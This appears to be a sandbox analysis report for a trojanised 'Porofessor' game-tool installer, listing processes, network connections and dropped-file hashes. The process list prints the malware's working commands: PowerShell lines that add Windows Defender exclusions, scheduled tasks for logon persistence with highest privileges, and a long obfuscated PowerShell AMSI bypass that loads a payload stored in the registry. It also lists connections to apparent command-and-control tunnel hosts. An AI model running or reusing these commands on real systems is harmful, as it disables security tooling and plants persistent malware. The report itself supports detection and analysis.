C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
C:\Windows\system32\dwm.exe
"dwm.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
C:\Windows\system32\sihost.exe
sihost.exe
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
C:\Windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
C:\Windows\sysmon.exe
C:\Windows\sysmon.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
C:\Windows\system32\wbem\unsecapp.exe
C:\Windows\system32\wbem\unsecapp.exe -Embedding
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\SppExtComObj.exe
C:\Windows\system32\SppExtComObj.exe -Embedding
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc
C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
"C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe
"C:\Users\Admin\AppData\Local\Temp\tmpfile-main\Porofessor_Setup.exe"
C:\Program Files\WinRAR\Temp\Updater.exe
"C:\Program Files\WinRAR\Temp\Updater.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Program Files\Node64.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe
"C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe" Sel=1&Partner=3776&Extension=pibhbkkgefgheeglaeemkkfjlhidhcedalapdggh&Name=Porofessor.gg&UtmSource=porofessor-website&UtmMedium=download-button&UtmCampaign=download-button&Referer=porofessor.gg&Browser=chrome -partnerCustomizationLevel 0 --app-name="Porofessor" -exepath C:\Program Files\WinRAR\Temp\Updater.exe
C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "Node64" /SC ONLOGON /TR "C:\Program Files\Node64.exe" /RL HIGHEST
C:\Windows\System32\DxDiag.exe
"C:\Windows\System32\DxDiag.exe" /tC:\Users\Admin\AppData\Local\Overwolf\Temp\DxDiagOutput.txt
C:\Program Files\Node64.exe
"C:\Program Files\Node64.exe"
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\servicing\TrustedInstaller.exe
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k WerSvcGroup
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node32.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node32" /SC ONLOGON /TR "C:\Windows\System32\$Node32.exe" /RL HIGHEST
C:\Windows\System32\$Node32.exe
"C:\Windows\System32\$Node32.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node2Json.exe'
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE" "function Local:KioPFOPJLoXW{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$zvAMVMTMpGFjoQ,[Parameter(Position=1)][Type]$iZzKMyfdqE)$qjYVfFLBouE=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+[Char](101)+'fle'+[Char](99)+'t'+'e'+''+'d'+''+'D'+''+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+[Char](97)+'te')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+'n'+[Char](77)+''+[Char](101)+''+[Char](109)+''+[Char](111)+''+[Char](114)+''+'y'+''+'M'+''+'o'+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+''+[Char](101)+''+[Char](108)+''+[Char](101)+''+'g'+''+'a'+'t'+[Char](101)+''+[Char](84)+''+[Char](121)+''+'p'+''+'e'+'',''+[Char](67)+''+'l'+''+[Char](97)+''+[Char](115)+''+'s'+','+[Char](80)+'u'+'b'+'lic'+[Char](44)+'Se'+[Char](97)+''+[Char](108)+''+'e'+''+[Char](100)+''+[Char](44)+'An'+'s'+''+[Char](105)+'C'+[Char](108)+'ass'+[Char](44)+''+[Char](65)+''+[Char](117)+'t'+'o'+'C'+'l'+''+'a'+''+[Char](115)+''+'s'+'',[MulticastDelegate]);$qjYVfFLBouE.DefineConstructor('R'+'T'+''+'S'+''+[Char](112)+'e'+[Char](99)+''+'i'+''+'a'+''+[Char](108)+''+[Char](78)+''+[Char](97)+''+[Char](109)+''+[Char](101)+''+[Char](44)+'H'+[Char](105)+''+'d'+'e'+[Char](66)+''+'y'+''+[Char](83)+''+[Char](105)+''+'g'+','+'P'+''+'u'+''+'b'+'l'+'i'+'c',[Reflection.CallingConventions]::Standard,$zvAMVMTMpGFjoQ).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+'tim'+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+'a'+''+[Char](103)+'e'+'d'+'');$qjYVfFLBouE.DefineMethod(''+[Char](73)+'n'+[Char](118)+''+[Char](111)+''+[Char](107)+''+[Char](101)+'',''+'P'+'u'+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+'H'+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+[Char](121)+''+'S'+'i'+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+'w'+''+[Char](83)+'lot'+[Char](44)+''+'V'+''+'i'+''+'r'+'t'+'u'+''+'a'+''+[Char](108)+'',$iZzKMyfdqE,$zvAMVMTMpGFjoQ).SetImplementationFlags('Ru'+[Char](110)+''+[Char](116)+''+[Char](105)+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $qjYVfFLBouE.CreateType();}$crbEeMsYAWAHN=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+''+[Char](101)+''+[Char](109)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')}).GetType(''+[Char](77)+''+'i'+''+'c'+''+[Char](114)+''+[Char](111)+''+'s'+'of'+[Char](116)+''+[Char](46)+'Wi'+'n'+''+[Char](51)+''+[Char](50)+''+[Char](46)+'U'+[Char](110)+''+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+''+[Char](78)+''+[Char](97)+''+'t'+''+[Char](105)+'ve'+[Char](77)+''+'e'+'th'+'o'+''+[Char](100)+''+[Char](115)+'');$bElbYgYIuskLxB=$crbEeMsYAWAHN.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+''+[Char](80)+''+'r'+''+[Char](111)+''+[Char](99)+'Addre'+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+'c'+[Char](44)+''+[Char](83)+'tati'+'c'+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$iUnxxmedEtTGkCBaLbG=KioPFOPJLoXW @([String])([IntPtr]);$jOsynmMZfBQvcleROMzgZj=KioPFOPJLoXW @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$uwWrwpeyFqH=$crbEeMsYAWAHN.GetMethod(''+'G'+''+'e'+''+[Char](116)+'M'+[Char](111)+''+[Char](100)+'u'+'l'+''+'e'+''+[Char](72)+''+[Char](97)+'n'+'d'+'l'+'e'+'').Invoke($Null,@([Object](''+'k'+'e'+[Char](114)+''+[Char](110)+''+[Char](101)+'l3'+[Char](50)+''+[Char](46)+''+'d'+''+[Char](108)+'l')));$VZQqyTBYdtDZOK=$bElbYgYIuskLxB.Invoke($Null,@([Object]$uwWrwpeyFqH,[Object]('L'+[Char](111)+''+[Char](97)+'dLib'+[Char](114)+''+[Char](97)+'ry'+'A'+'')));$lNDeybodhYSdonzDf=$bElbYgYIuskLxB.Invoke($Null,@([Object]$uwWrwpeyFqH,[Object]('V'+'i'+''+'r'+''+'t'+''+[Char](117)+''+[Char](97)+''+[Char](108)+'P'+'r'+''+[Char](111)+''+[Char](116)+'e'+[Char](99)+''+'t'+'')));$tiBbssI=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VZQqyTBYdtDZOK,$iUnxxmedEtTGkCBaLbG).Invoke(''+[Char](97)+''+[Char](109)+''+[Char](115)+''+[Char](105)+''+[Char](46)+''+'d'+''+'l'+''+[Char](108)+'');$bWPYbujdWzPUnlTpG=$bElbYgYIuskLxB.Invoke($Null,@([Object]$tiBbssI,[Object]('Am'+'s'+''+'i'+''+[Char](83)+''+[Char](99)+'a'+[Char](110)+''+[Char](66)+''+[Char](117)+''+[Char](102)+''+[Char](102)+'e'+'r'+'')));$uOCXWOgTtl=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lNDeybodhYSdonzDf,$jOsynmMZfBQvcleROMzgZj).Invoke($bWPYbujdWzPUnlTpG,[uint32]8,4,[ref]$uOCXWOgTtl);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$bWPYbujdWzPUnlTpG,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($lNDeybodhYSdonzDf,$jOsynmMZfBQvcleROMzgZj).Invoke($bWPYbujdWzPUnlTpG,[uint32]8,0x20,[ref]$uOCXWOgTtl);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+'O'+'F'+''+'T'+'W'+[Char](65)+'RE').GetValue(''+[Char](36)+''+[Char](78)+''+[Char](111)+'d'+[Char](101)+''+[Char](115)+'ta'+'g'+''+'e'+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
C:\Windows\System32\mousocoreworker.exe
C:\Windows\System32\mousocoreworker.exe -Embedding
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node2Json" /SC ONLOGON /TR "C:\Windows\System32\$Node2Json.exe" /RL HIGHEST
C:\Windows\System32\$Node2Json.exe
"C:\Windows\System32\$Node2Json.exe"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\$Node3Json.exe'
C:\Windows\System32\schtasks.exe
"C:\Windows\System32\schtasks.exe" /Create /F /TN "$Node3Json" /SC ONLOGON /TR "C:\Windows\System32\$Node3Json.exe" /RL HIGHEST
C:\Windows\System32\$Node3Json.exe
"C:\Windows\System32\$Node3Json.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s DsmSvc
C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{0b9d97cd-70d0-4750-963d-4863934568ef}
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 201.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 20.160.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | analyticsnew.overwolf.com | udp |
| GB | 54.230.10.62:80 | analyticsnew.overwolf.com | tcp |
| US | 8.8.8.8:53 | 62.10.230.54.in-addr.arpa | udp |
| GB | 216.58.204.78:80 | www.google-analytics.com | tcp |
| GB | 54.230.10.62:443 | analyticsnew.overwolf.com | tcp |
| US | 8.8.8.8:53 | 78.204.58.216.in-addr.arpa | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | 1.112.95.208.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 217.106.137.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 131.226.101.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 104.20.3.235:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | 235.3.20.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | visit-kill.gl.at.ply.gg | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | every-bend.gl.at.ply.gg | udp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 206.23.85.13.in-addr.arpa | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 216.203.100.95.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.204.248.87.in-addr.arpa | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | 31.243.111.52.in-addr.arpa | udp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
| US | 147.185.221.23:51861 | visit-kill.gl.at.ply.gg | tcp |
| US | 147.185.221.21:48150 | every-bend.gl.at.ply.gg | tcp |
Files
memory/3564-0-0x00007FF9D6323000-0x00007FF9D6325000-memory.dmp
memory/3564-1-0x00000000008D0000-0x0000000000B52000-memory.dmp
C:\Program Files\WinRAR\Temp\Updater.exe
| MD5 | 5f6bcb8ac6f38320eaa317a982c0a795 |
| SHA1 | 116361e38b82776e2298d486faf11470c8d536c7 |
| SHA256 | 7e67ad2b6f7ed0e1d2720f038169b2c625f16b15e15f78e549268b4b6794fd85 |
| SHA512 | b170d677dad9b9434450d55930070a7887f8e35cf397899ffa9aeb68e7b98c18ed7bf261dacbd9800ee4db98dc5ae8924253d12210b0bf404ea29bedbe28e195 |
memory/3564-13-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp
memory/1240-16-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_g5eiqg0h.3zn.ps1
| MD5 | d17fe0a3f47be24a6453e9ef58c94641 |
| SHA1 | 6ab83620379fc69f80c0242105ddffd7d98d5d9d |
| SHA256 | 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7 |
| SHA512 | 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82 |
memory/1240-23-0x000001E2FF720000-0x000001E2FF742000-memory.dmp
memory/1240-27-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\uac.dll
| MD5 | 861f7e800bb28f68927e65719869409c |
| SHA1 | a12bfcd2b9950e758ead281a9afbf1895bf10539 |
| SHA256 | 10a0e8cf46038ab3b2c3cf5dce407b9a043a631cbde9a5c8bcf0a54b2566c010 |
| SHA512 | f2bf24a0da69bbe4b4a0f0b1bfc5af175a66b8bcc4f5cc379ed0b89166fa9ffe1e16206b41fca7260ac7f8b86f8695b76f016bb371d7642aa71e61e29a3976eb |
memory/1240-44-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\System.dll
| MD5 | 51bd16a2ea23ae1e7a92cedc6785c82e |
| SHA1 | a9fbaeb9a695b9f2ba8a3ed8f0d95d2bf6a3d36c |
| SHA256 | 4dbc79d2b1c7987cc64bb5d014db81bb5108bdd6d8bf3a5f820fac1ded62be33 |
| SHA512 | 66ffc18b2daf6c4cba01aef0e4af2f006a51aa218eab0f21dc66e47eea0389d2b1748ef0e30d2ec9f0123fd7f38ed3aee964dd6bde5779aaee19ebf55369af79 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\UserInfo.dll
| MD5 | 1dd4ca0f4a94155f8d46ec95a20ada4a |
| SHA1 | 5869f0d89e5422c5c4ad411e0a6a8d5b2321ff81 |
| SHA256 | a27dc3069793535cb64123c27dca8748983d133c8fa5aaddee8cdbc83f16986d |
| SHA512 | f4914edc0357af44ed2855d5807c99c8168b305e6b7904dc865771ad0ee90756038612fe69c67b459c468396d1d39875395b1c8ec69e6da559fb92859204763e |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\INetC.dll
| MD5 | 87050902acf23fa5aa6d6aa61703db97 |
| SHA1 | d5555e17151540095a8681cd892b79bce8246832 |
| SHA256 | 0ecf8b76a413726d2a9c10213ad6e406211330e9e79cfde5024968eedc64a750 |
| SHA512 | d75d3fc84a61887ee63bad3e5e38f6df32446fd5c17bedce3edca785030b723b13134b09a9bbbbaca86d5ea07405b8c4afd524cc156a8c1d78f044a22dee9eab |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\utils.dll
| MD5 | c6b46a5fcdccbf3aeff930b1e5b383d4 |
| SHA1 | 6d5a8e08de862b283610bad2f6ce44936f439821 |
| SHA256 | 251ab3e2690562dcfcd510642607f206e6dcf626d06d94b74e1fa8297b1050a0 |
| SHA512 | 97616475ef425421959489b650810b185488fcb02a1e90406b3014e948e66e5101df583815fd2be26d9c4d293a46b02ba4025426f743e682ed15d228f027f55c |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWInstaller.exe
| MD5 | d5728a6ad16073a60d48573414164702 |
| SHA1 | a17dbae62803c53aa356191e1a6074edfd7c8deb |
| SHA256 | 9b997908281feeec1d7bfc36515b939e581eb38e07c4849d24811bb48cc95b3e |
| SHA512 | 5608c2a270e07263cb41cddcaad48a348f5c54e10b3bd5e3d1803663fbffeaa0c9abbce8f15f9b5e8f53c84efe870960f25ff4080d38f09463c16dad43aad90d |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OWinstaller.exe.config
| MD5 | 82d22e4e19e27e306317513b9bfa70ff |
| SHA1 | ff3c7dd06b7fff9c12b1beaf0ca32517710ac161 |
| SHA256 | 272e4c5364193e73633caa3793e07509a349b79314ea01808b24fdb12c51b827 |
| SHA512 | b0fb708f6bcab923f5b381b7f03b3220793eff69559e895d7cf0e33781358ec2159f9c8276bf8ba81302feda8721327d43607868de5caaa9015d7bb82060a0b9 |
memory/3720-164-0x0000020265290000-0x00000202652DE000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\OverWolf.Client.CommonUtils.dll
| MD5 | 9562911e11231c09a4d420378c286f64 |
| SHA1 | a093e50dfb3cd7b71265d20c78c6182857ea518f |
| SHA256 | c44259feeeae0f009deeffe5b83ed7e72727b8c409c7b62ef6ecb7b24b78b12a |
| SHA512 | 6cc6baeb2ca726856c7ba4cfe5a9bf247584a28470dd0de3794274883693d6a0efe922af492e487beae21b53198413e61596ad0e70d448c92acdb06dd9143e5d |
memory/3720-168-0x000002027F7C0000-0x000002027F866000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\CommandLine.dll
| MD5 | 6d11c677cae02caa249a4f7f35fff112 |
| SHA1 | b417114c9b95ac2f3a2e9a68bf669f7342cd4cdb |
| SHA256 | dde08c1db1ff43b08c7de59ae14045cb6fec13bec7ac65e142142453b8ab1ad4 |
| SHA512 | f992c2ad42372d0981e8512b34516b88c8ecacd89ade1027600ad883a6346c2b9d448fb027d38915b15f15f39c6b7f7d25c9af0c36835ff85224e48034609857 |
memory/3720-170-0x0000020265690000-0x00000202656A4000-memory.dmp
memory/3720-171-0x0000020200000000-0x0000020200528000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\log4net.dll
| MD5 | f15c8a9e2876568b3910189b2d493706 |
| SHA1 | 32634db97e7c1705286cb1ac5ce20bc4e0ec17af |
| SHA256 | ae9c8073c3357c490f5d1c64101362918357c568f6b9380a60b09a4a4c1ff309 |
| SHA512 | 805cd0a70aba2f1cf66e557d51ad30d42b32fbafcfbc6685ec204bc69847619479f653f4f33a4e466055707880d982eb1574ddab8edfa3c641e51cda950e2a0e |
memory/3720-175-0x000002027F710000-0x000002027F756000-memory.dmp
memory/1240-176-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp
C:\Users\Admin\AppData\Local\Overwolf\Log\InstallerTrace_2024-12-02_16-11_3720.log
| MD5 | ce265b8c496346a53f144d5e6ebe74c9 |
| SHA1 | 793510078bec8695e0d925fb4227eb07f2dfb3d2 |
| SHA256 | 366445d8638f1a659137a75f0c63ae1ad81a422be661521da68a78ef550b51ed |
| SHA512 | e7dc18a7efe72032af070ebd092eec51cc7908ae5f8651d016aa5103733f66e850e51c6fafb94adf981110894074518a1bc8d7249aaa0f21ede2cd4729997e2a |
memory/3720-180-0x0000020267000000-0x0000020267018000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\SharpRaven.dll
| MD5 | f2f1cd4e9b1f772b7b7955c3310a126a |
| SHA1 | 6ea2b5ee4461053ad353d4826ba61388f98c28fc |
| SHA256 | a8cd61fc4478da0464967f5c74b6ecc6a880e879f49ba552f7c3056d3d0d562a |
| SHA512 | 587aec3e0b2c913eb40259928dee536ffdb4f51c693682bf926351c86e1ace020bfff3fd9f279a48ecb0d2a46a460aa5d8adeddb3e268c7a5e5dae220100b66d |
C:\Program Files\Node64.exe
| MD5 | 47fe2649cc2325a477fce08731aeb716 |
| SHA1 | 268abf2cceac62263fe040dc40b8b4b9aa3592da |
| SHA256 | d3808b41fe847339d9d69eaa05a5c7dea072b3e6325127a53b54c0d5e102f49b |
| SHA512 | 173bd39f32dc4c95309e8e23a33542f92bb1c22459be30e47b52ab92827f418c7ba59fd9b31606f7f40824366e949e7de89a851d1acb8425bbf7fd607632e0d4 |
memory/3564-205-0x00007FF9D6320000-0x00007FF9D6DE2000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\Newtonsoft.Json.dll
| MD5 | 98cbb64f074dc600b23a2ee1a0f46448 |
| SHA1 | c5e5ec666eeb51ec15d69d27685fe50148893e34 |
| SHA256 | 7b44639cbfbc8ddac8c7a3de8ffa97a7460bebb0d54e9ff2e1ccdc3a742c2b13 |
| SHA512 | eb9eabee5494f5eb1062a33cc605b66d051da6c6990860fe4fd20e5b137458277a636cf27c4f133012d7e0efaa5feb6f48f1e2f342008482c951a6d61feec147 |
memory/3720-210-0x000002027FE80000-0x000002027FF30000-memory.dmp
memory/2164-209-0x0000000000BF0000-0x0000000000C52000-memory.dmp
C:\Users\Admin\AppData\Local\Overwolf\Settings\SettingsPageBasic.xml
| MD5 | ea894da174415741562988d1d8d72054 |
| SHA1 | 4f8457032165f0af6aa19f54f8bad3246c5cbc2b |
| SHA256 | bcb40a57a732e84f4917cc4433ccf7883254589f5c6ec84e39549037dc145d31 |
| SHA512 | 39452cc4db55bb62a1ec412b8641f5e8d24a70db7c21c47b154d69e89cc9580e78b8a489c2ce70bdb70bbabb9c3c08ae62c5a3c933dbcd41c6dde54bbca17367 |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\manifest.json
| MD5 | b22a7aee785fd57c82dd5f7f76a0b300 |
| SHA1 | 97528822fed8e42faa0de1f4d4c3de61cc6ce1e3 |
| SHA256 | 53faf2f62e7aa22b60bc926803461213ce4230e114fce86acfe5cfd720f1dfb4 |
| SHA512 | 4c66855ae30762b53f6f31bcfd3a24183614f8be716dc08180d5df2c71729ff0f1957ab04fc43b70e73c7e95511143e42dfde8150d2feb758804fecb12dd877d |
C:\Users\Admin\AppData\Local\Temp\nsbD514.tmp\app\images\icon.ico
